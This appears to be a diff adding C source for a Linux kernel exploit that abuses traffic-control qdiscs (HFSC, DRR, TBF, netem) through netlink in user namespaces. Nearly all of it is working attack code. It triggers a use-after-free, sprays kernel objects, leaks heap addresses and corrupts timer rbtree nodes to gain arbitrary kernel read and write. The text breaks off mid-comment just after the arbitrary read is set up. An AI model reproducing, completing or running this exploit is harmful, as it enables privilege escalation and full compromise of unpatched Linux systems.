usc_class_msg = { + { + .nlmsg_len = sizeof(struct usc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 36, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m2 = 1, + }, + .usc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_USC, + }, + .usc = { + .m2 = 1, + }, +}; + +/* Add/modify a DRR qdisc */ +struct __attribute__((packed)) drr_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; +}; + +struct drr_qdisc_msg drr_qdisc_msg = { + { + .nlmsg_len = sizeof(struct drr_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", +}; + +struct __attribute__((packed)) drr_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr quantum_hdr; + int quantum; +}; + +/* Add/modify a DRR class */ +struct drr_class_msg drr_class_msg = { + { + .nlmsg_len = sizeof(struct drr_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", + .options_hdr = { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .quantum_hdr = { + .rta_len = 8, + .rta_type = TCA_DRR_QUANTUM, + }, + .quantum = 65536, +}; + +/* Add/modify a TBF qdisc to let packets through */ +struct __attribute__((packed)) tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; +}; + +struct tbf_qdisc_msg tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 44, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .buffer = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1000000000, + }, + }, +}; + +/* Add/modify a TBF qdisc to wait for pkt_len-1 secs */ +struct __attribute__((packed)) stall_tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; + struct rtattr burst_hdr; + int burst; +}; + +struct stall_tbf_qdisc_msg stall_tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct stall_tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 52, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1, + }, + }, + .burst_hdr = { + .rta_len = 8, + .rta_type = TCA_TBF_BURST, + }, + .burst = 1, +}; + + +/* Add/modify a netem qdisc to delay the packet */ +struct __attribute__((packed)) delay_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; +}; + +struct delay_netem_qdisc_msg delay_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct delay_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 28, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + .latency = -1, + } +}; + +/* Add/modify a netem qdisc with many parameters. Used for type confusion */ +struct __attribute__((packed)) parms_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr ecn_hdr; + int ecn; + struct rtattr latency_hdr; + long latency; + struct rtattr jitter_hdr; + long jitter; + struct rtattr reorder_hdr; + struct tc_netem_reorder reorder; + struct rtattr corrupt_hdr; + struct tc_netem_corrupt corrupt; + struct rtattr rate_hdr; + struct tc_netem_rate rate; + struct rtattr rate64_hdr; + long rate64; + struct rtattr slot_hdr; + struct tc_netem_slot slot; +}; + +struct parms_netem_qdisc_msg parms_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct parms_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = { + .rta_len = 160, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + }, + .ecn_hdr = { + .rta_len = 8, + .rta_type = TCA_NETEM_ECN, + }, + .latency_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_LATENCY64, + }, + .jitter_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_JITTER64, + }, + .reorder_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_REORDER, + }, + .corrupt_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_CORRUPT, + }, + .rate64_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_RATE64, + }, + .rate_hdr = { + .rta_len = 20, + .rta_type = TCA_NETEM_RATE, + }, + .slot_hdr = { + .rta_len = 44, + .rta_type = TCA_NETEM_SLOT, + }, +}; + +/* Add/modify a netem qdisc with a slot_dist buffer */ +struct __attribute__((packed)) dist_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr dist_hdr; + char dist[DIST_SIZE]; +}; + +struct dist_netem_qdisc_msg dist_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct dist_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 32 + DIST_SIZE, + .rta_type = TCA_OPTIONS, + }, + .dist_hdr = { + .rta_len = 4 + DIST_SIZE, + .rta_type = TCA_NETEM_SLOT_DIST, + }, +}; + + +/* Add a basic filter */ +struct __attribute__((packed)) basic_filter_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr classid_hdr; + int classid; +}; + +struct basic_filter_msg basic_filter_msg = { + { + .nlmsg_len = sizeof(struct basic_filter_msg), + .nlmsg_type = RTM_NEWTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + .tcm_handle = 1, + .tcm_info = TC_H_MAKE(1 << 16, 3 << 8), + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "basic", + .options_hdr = + { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .classid_hdr = { + .rta_len = 8, + .rta_type = TCA_BASIC_CLASSID, + }, +}; + + +/* Delete all of a qdisc's filters */ +struct tf_msg del_filter_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a qdisc */ +struct tf_msg del_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a class */ +struct tf_msg del_class_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Dump info for all qdiscs */ +struct tf_msg get_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_GETQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_DUMP, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + + +/* Syscall used to wait for RCU grace period */ +int membarrier(unsigned int flags, int cpu_id) { + return syscall(SYS_membarrier, flags, cpu_id); +} + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +struct sockaddr_in iaddr; +int nl_sock_fd, inet_sock_fd; +int nl_socks[4], inet_socks[4]; +void loopback_send (void) { + if (sendto(inet_sock_fd, "", 1, 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); +} + +/* Helper functions for sending netlink messages */ + +void netlink_write (int sock, struct nlmsghdr *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack = {}; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.nh.nlmsg_type == NLMSG_ERROR && ack.ne.error) { + errno = -ack.ne.error; + err_exit("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct nlmsghdr *m) { + m->nlmsg_flags &= ~NLM_F_ACK; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + m->nlmsg_flags |= NLM_F_ACK; +} + +int tc_add_qd (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_qd (int parent) { + struct tf_msg *m = &del_qdisc_msg; + m->tm.tcm_parent = parent; + netlink_write(nl_sock_fd, m); +} + +int tc_add_cl (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = parent | handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_cl (int handle) { + struct tf_msg *m = &del_class_msg; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); +} + +void tc_add_fl (struct basic_filter_msg *m, int clid) { + m->tm.tcm_parent = clid & 0xffff0000; + m->classid = clid; + netlink_write(nl_sock_fd, m); +} + +void tc_del_fl (int clid) { + struct tf_msg *m = &del_filter_msg; + m->tm.tcm_parent = clid & 0xffff0000; + netlink_write(nl_sock_fd, m); + +} + +void switch_ns (int ns) { + nl_sock_fd = nl_socks[ns - 1]; + inet_sock_fd = inet_socks[ns - 1]; + curr_ns = ns; +} + +/* Trigger the bug, creating a dangling pointer to parent class. + * Qdiscs must be configured so packet is enqueued at target class. */ +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} + +/* Functions for reading and writing kernel memory */ + +void write_netem_parms(int handle, int *parms, struct tc_netem_slot *slot) { + struct parms_netem_qdisc_msg *m = &parms_netem_qdisc_msg; + if (parms) { + m->latency = *(long *)&parms[0]; + m->jitter = parms[2]; + // parms[3] corresponds to unwritable memory + m->qopt.loss = parms[4]; + m->ecn = parms[5]; + m->qopt.limit = parms[6]; + // parms[7] corresponds to unwritable memory + m->qopt.gap = parms[8]; + m->qopt.duplicate = parms[9]; + m->reorder.probability = parms[10]; + m->corrupt.probability = parms[11]; + m->rate64 = *(long *)&parms[12]; + } + if (slot) + m->slot = *slot; + tc_add_qd(m, 0, handle); +} + +void read_netem_parms (int handle, char *buf) { + int nread, tread = 0; + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(int *)&msgbuf[i] == handle /* "netem" */ + && *(long *)&msgbuf[i + 16] == 0x6d6574656e) { + off = i; + break; + } + } + + if (off != -1) { + memcpy(buf, msgbuf + off + 56, 8); // latency + memcpy(buf + 8, msgbuf + off + 68, 8); // jitter + memcpy(buf + 16, msgbuf + off + 36, 4); // loss + memcpy(buf + 20, msgbuf + off + 140, 4); // ecn + memcpy(buf + 24, msgbuf + off + 32, 4); // limit + memset(buf + 28, 0, 4); // counter (always zero) + memcpy(buf + 32, msgbuf + off + 40, 4); // gap + memcpy(buf + 36, msgbuf + off + 44, 4); // duplicate + memcpy(buf + 40, msgbuf + off + 96, 4); // reorder + memcpy(buf + 44, msgbuf + off + 108, 4); // corrupt + memcpy(buf + 48, msgbuf + off + 120, 8); // rate + } + memset(msgbuf, 0, sizeof(msgbuf)); +} + +long *stab_addr; +int stab_handle; +int stab_ns; +long stab_needle; +long stab_parms_buf[7], stab_slot_buf[5]; + +void setup_stab_read (int handle, long parms_kaddr, long slot_kaddr, int ns) { + int flags = 0x80; + memcpy((char *)stab_parms_buf + 9, &flags, 4); + slot_kaddr += 32; + memcpy((char *)stab_parms_buf + 33, &slot_kaddr, 8); + slot_kaddr -= 32; + + parms_kaddr += 48 - IFINDEX_OFF; + memcpy((char *)stab_parms_buf + 1, &parms_kaddr, 8); + parms_kaddr -= 48 - IFINDEX_OFF; + + stab_parms_buf[6] = 0xdeadbeef; // lower bytes of needle + + stab_slot_buf[1] = 0; // flags ; limit + stab_slot_buf[2] = parms_kaddr + 232; // ops + stab_slot_buf[3] = 0xbad57ab; // stab + stab_slot_buf[4] = 0; // hash + + stab_addr = &stab_slot_buf[3]; + stab_needle = stab_slot_buf[2] << 32 | stab_parms_buf[6]; + stab_handle = handle; + stab_ns = ns; +} + +void read_netem_stab (long needle, char *buf, int n) { + int nread, tread = 0; + + int old_ns = curr_ns; + switch_ns(stab_ns); + + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= - sizeof(int); i++) { + if (*(long *)&msgbuf[i] == needle) { + off = i; + break; + } + } + + n = n > 24 ? 24 : n; + if (off != -1) + memcpy(buf, msgbuf + off + STAB_OFF, n); + else + printf("[-] Failed to find stab\n"); + + memset(msgbuf, 0, sizeof(msgbuf)); + switch_ns(old_ns); +} + +long stab_read_8 (long addr) { + long val; + int old_ns = curr_ns; + switch_ns(stab_ns); + *stab_addr = addr - 32; + write_netem_parms(stab_handle, stab_parms_buf, stab_slot_buf); + tc_add_qd(&parms_netem_qdisc_msg, 0, stab_handle); + read_netem_stab(stab_needle, &val, 8); + switch_ns(old_ns); + return val; +} + +int vt_handle; +int vt_ns; +long vt_dist_p_kaddr; +long setup_vt_write (int handle, long addr, int ns) { + int old_ns = curr_ns; + vt_ns = ns; + switch_ns(vt_ns); + vt_handle = handle; + vt_dist_p_kaddr = addr + PRIVDATA_OFF + SLOT_DIST_OFF; + hfsc_qdisc_msg.def = 0; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x150000); + switch_ns(old_ns); +} + +long root_addr; +void vt_write_8 (long addr, long val) { + long parms[7] = {}, *hfsc_class, dist_kaddr; + + int old_ns = curr_ns; + switch_ns(vt_ns); + + hfsc_class = &dist_netem_qdisc_msg.dist[HFSC_CLASS_START]; + ((int *)hfsc_class)[LEVEL_OFF/4] = 1; + hfsc_class[PARENT_OFF/8] = addr - CL_CVTMIN_OFF; + hfsc_class[CL_VT_OFF/8] = val; + + tc_add_qd(&dist_netem_qdisc_msg, 0, vt_handle); + + dist_kaddr = stab_read_8(vt_dist_p_kaddr); + dist_kaddr += TABLE_OFF + HFSC_CLASS_START + VT_NODE_OFF; + memcpy((char *)parms + 1, &dist_kaddr, 8); + + write_netem_parms(vt_handle, parms, NULL); + loopback_send(); + + switch_ns(old_ns); +} + +/* Functions for setting timers */ + +int add_order[] = { 0, 1, 2, 4, 9, 3, 5, 11, 10, 13, 12, 15, 6, 7, 8, 14, 16, }; +#define NUM_NODES (sizeof(add_order)/sizeof(*add_order)) +#define NUM_NEG_NODES 20 +int timer_fds[NUM_NODES]; +int neg_timerfds[NUM_NEG_NODES]; +void init_timers () { + for (int i = 0; i < NUM_NODES - 2; i++) { + timer_fds[add_order[i]] = timerfd_create(CLOCK_MONOTONIC, 0); + if (timer_fds[i] == -2) + err_exit("[-] timerfd_create"); + } + for (int i = 0; i < NUM_NEG_NODES; i++) { + neg_timerfds[i] = timerfd_create(CLOCK_MONOTONIC, 0); + if (neg_timerfds[i] == -1) + err_exit("[-] timerfd_create"); + } +} + +void add_neg_nodes (void) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(-1); + for (int i = 0; i < NUM_NEG_NODES; i++) { + if (timerfd_settime(neg_timerfds[i], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); + } +} + +void add_timer_node (long label) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(label); + if (timerfd_settime(timer_fds[label], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +void rm_timer_node (long val) { + struct itimerspec t = {}; + if (timerfd_settime(timer_fds[val], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +#define GR 0x61c88647u +#define QDISC_HASH(x) ((x)*GR >> 28) +long handle_to_kaddr (int handle, long netdevq_kaddr) { + long next_addr; + next_addr = stab_read_8(netdevq_kaddr + NET_DEVICE_OFF) + QDISC_HASH_TABLE_OFF; + next_addr = stab_read_8(next_addr + 8*QDISC_HASH(handle)); + while (next_addr) { + if ((int)stab_read_8(next_addr + HANDLE_OFF - QDISC_HLIST_OFF) == handle) + return next_addr - QDISC_HLIST_OFF; + next_addr = stab_read_8(next_addr); + } + return 0; +} + +int drr_spray_and_find (int parent) { + int drr_spray[DRR_SPRAY]; + + for (int i = 0; i < DRR_SPRAY; i++) + drr_spray[i] = tc_add_cl(&drr_class_msg, parent, i + 1); + + int target = 0; + for (int i = 0; i < DRR_SPRAY; i++) { + if (!target) { + tc_add_fl(&basic_filter_msg, drr_spray[i]); + loopback_send(); + if (recv(inet_sock_fd, &msgbuf, 1, MSG_DONTWAIT) != -1) { + target = drr_spray[i]; + printf("[+] Found target DRR class %x\n", target); + continue; + } + tc_del_fl(drr_spray[i]); + } + tc_del_cl(drr_spray[i]); + } + + if (!target) + printf("[-] DRR spray on %x failed\n", parent); + + return target; +} + +int add_qdisc_timer_node (int parent, int root, int *spray_handles, + int spray_hash, int label, int ns_outer, int ns_inner) { + + /* Handles of the current leaf of the three branches, and handle of tbf qdisc's parent */ + int b1, b2, b3, pin, tbfp; + + switch_ns(ns_outer); + + /* Add subtree root */ + hfsc_qdisc_msg.def = 1; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + /* Set up upper layers */ + b1 = tc_add_cl(&rsc_class_msg, root, 1); + b1 = tc_add_qd(&drr_qdisc_msg, b1, 0xffff0000); + pin = tc_add_cl(&drr_class_msg, b1, 2); + b1 = tc_add_cl(&drr_class_msg, b1, 1); + + switch_ns(ns_inner); + b2 = tc_add_qd(&drr_qdisc_msg, -1, root + 0x30000); + switch_ns(ns_outer); + + b3 = tc_add_cl(&fsc_class_msg, root, 3); + b3 = tc_add_qd(&drr_qdisc_msg, b3, root + 0x40000); + tc_add_fl(&basic_filter_msg, b3 | 1); + + /* Create dangling pointer above TBF qdisc */ + tc_add_fl(&basic_filter_msg, b1); + trigger_vuln(b1); + + tc_del_fl(b1); + tc_add_fl(&basic_filter_msg, pin); + trigger_vuln(pin); + + hfsc_qdisc_msg.def = 3; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + tc_del_cl(b1); // Create dangling pointer + switch_ns(ns_inner); + tbfp = tc_add_cl(&drr_class_msg, b2, 1); + + /* Spray to prevent a later allocation + accidentally going under the dangling pointer + in case the allocation above missed it */ + for (int i = 1; i < DRR_SPRAY; i++) + tc_add_cl(&drr_class_msg, b2, i + 1); + tc_add_fl(&basic_filter_msg, tbfp); + + /* Add TBF qdisc */ + b2 = tc_add_qd(&tbf_qdisc_msg, tbfp, root + 0x50000); + b2 = tc_add_qd(&drr_qdisc_msg, b2, 0xffff0000); + tc_add_fl(&basic_filter_msg, b2 | 1); + + /* Create dangling pointer under TBF qdisc */ + b2 = tc_add_cl(&drr_class_msg, b2, 1); + + trigger_vuln(b2); + + tc_del_fl(tbfp); + tc_del_cl(b2); // Create dangling pointer + switch_ns(ns_outer); + b3 = drr_spray_and_find(b3); + + if (!b3) { + tc_del_qd(-1); + switch_ns(ns_inner); + tc_del_qd(-1); + switch_ns(ns_outer); + return 1; + } + + + switch_ns(ns_inner); + + for (int i = 0; i < clog_len; i++) + tc_add_cl(&drr_class_msg, 0xffff0000, i + 2); + + tc_add_qd(&stall_tbf_qdisc_msg, tbfp, 0); + + switch_ns(ns_outer); + + /* Choose netem handles */ + for (int i = 0x10000000, j = 0; j < NETEM_SPRAY; i += 0x10000) { + if (QDISC_HASH(i) == spray_hash) + spray_handles[j++] = i; + } + + /* Wait for previously deleted qdiscs to be freed */ + printf("[*] Adding qdisc timer node %d\n", label); + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Destroy TBF qdisc */ + switch_ns(ns_inner); + tc_del_cl(tbfp); + switch_ns(ns_outer); + + /* Set timer on TBF qdisc */ + if (sendto(inet_sock_fd, &msgbuf, LABEL_TO_VALUE(label), 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); + + /* Wait for TBF qdisc to be freed */ + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Spray netem qdiscs */ + for (int i = 0; i < NETEM_SPRAY; i++) + b3 = tc_add_qd(&parms_netem_qdisc_msg, b3, spray_handles[i]); + + return 0; +} + +int main (int argc, char **argv) { + + if (argc > 1) { + clog_len = atoi(argv[1]); + } else { + clog_len = CLOG_LEN; + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + + for (int i = 0; i < 4; i++) { + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open socket to send netlink commands to */ + nl_socks[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_socks[i] == -1) + err_exit("[-] nl socket"); + + /* Set lo up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_socks[i], &if_up_msg); + + /* Open inet sockets */ + iaddr.sin_family = AF_INET; + iaddr.sin_port = htons(1); + iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + inet_socks[i] = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_socks[i] == -1) + err_exit("[-] inet socket"); + if (bind(inet_socks[i], &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] inet bind"); + } + + pin_cpu(0); + + /* Add timer nodes to tree */ + init_timers(); + add_neg_nodes(); + for (int i = 0; i < NUM_NODES - 2; i++) + add_timer_node(add_order[i]); + + /* Add dangling qdisc pointers to tree */ + int parent, n1, n2, netem_spray1[NETEM_SPRAY], netem_spray2[NETEM_SPRAY], enq_qd; + + switch_ns(1); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x150000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x1000000, netem_spray1, 1, add_order[NUM_NODES - 2], 1, 3)); + + switch_ns(2); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x20000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x2000000, netem_spray2, 2, add_order[NUM_NODES - 1], 2, 4)); + + /* Enqueue a packet at netem_spray[0] for later */ + switch_ns(2); + hfsc_qdisc_msg.def = 2; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x20000); + parent = tc_add_cl(&rsc_class_msg, 0x20000, 2); + enq_qd = tc_add_qd(&delay_netem_qdisc_msg, parent, 0x2a0000); + loopback_send(); + + + /* Leak heap addresses of attacker netem qdics by removing 15 */ + + long n1_base_kaddr, n1_parms_kaddr, n1_slot_kaddr, n2_base_kaddr, n2_parms_kaddr, n2_slot_kaddr; + long n1_parms_buf[7] = {}, n2_parms_buf[7] = {}; + long n1_slot_buf[5] = {}, n2_slot_buf[5] = {}; + + rm_timer_node(15); + + switch_ns(1); + n1 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray1[i], n1_parms_buf); + if (n1_parms_buf[0]) { + n1 = netem_spray1[i]; + break; + } + } + + switch_ns(2); + n2 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray2[i], n2_parms_buf); + if (n2_parms_buf[0]) { + n2 = netem_spray2[i]; + break; + } + } + if (n1 == -1 || n2 == -1) { + printf("[-] Heap address leak failed: n1 = %x, n2 = %x\n", n1, n2); + exit(EXIT_FAILURE); + } + + if (NETEM_SPRAY > 1) { + switch_ns(1); + tc_del_qd(n1); + switch_ns(2); + tc_del_qd(n2); + } + + + n2_parms_kaddr = n1_parms_buf[0]; + n2_base_kaddr = n2_parms_kaddr & ~1023; + n2_slot_kaddr = n2_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + n1_parms_kaddr = n2_parms_buf[2]; + n1_base_kaddr = n1_parms_kaddr & ~1023; + n1_slot_kaddr = n1_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + printf("[+] Found qdiscs: n1 handle = %x, n1 addr = %p\n" + " n2 handle = %x, n2 addr = %p\n", + n1, n1_base_kaddr, n2, n2_base_kaddr); + + + /* Overwrite n2->slot_dist by removing 13 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (s) (c) + \ + (c) + + y is at &n2->latency + */ + + n2_parms_buf[2] = n1_parms_kaddr + 32; // y->rb_left = s = &n1_latency + 32 + n1_parms_buf[5] = n2_base_kaddr + PRIVDATA_OFF + SLOT_DIST_OFF; // s->rb_right = &n2->slot_dist + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + + rm_timer_node(13); + + /* Overwrite n2->hash.next by removing 11 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->latency + 32 + */ + + n1_parms_buf[6] = n2_parms_kaddr + 32; // y->rb_left = p = &n1->latency + 32 + n2_parms_buf[6] = n1_slot_kaddr + 8; // p->rb_left = s = &n1->slot + 8 + n1_slot_buf[2] = n2_base_kaddr + 40; // s->rb_right = c = &n2->hash.next + n1_slot_buf[3] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + rm_timer_node(11); + + /* Set up arbitrary read */ + setup_stab_read(n2, n2_parms_kaddr, n2_slot_kaddr, 2); + + printf("[*] Arbitrary read set up\n"); + + /* Overwrite root qdisc's vt_tree by removing 9 (labeled n below) + + (n) 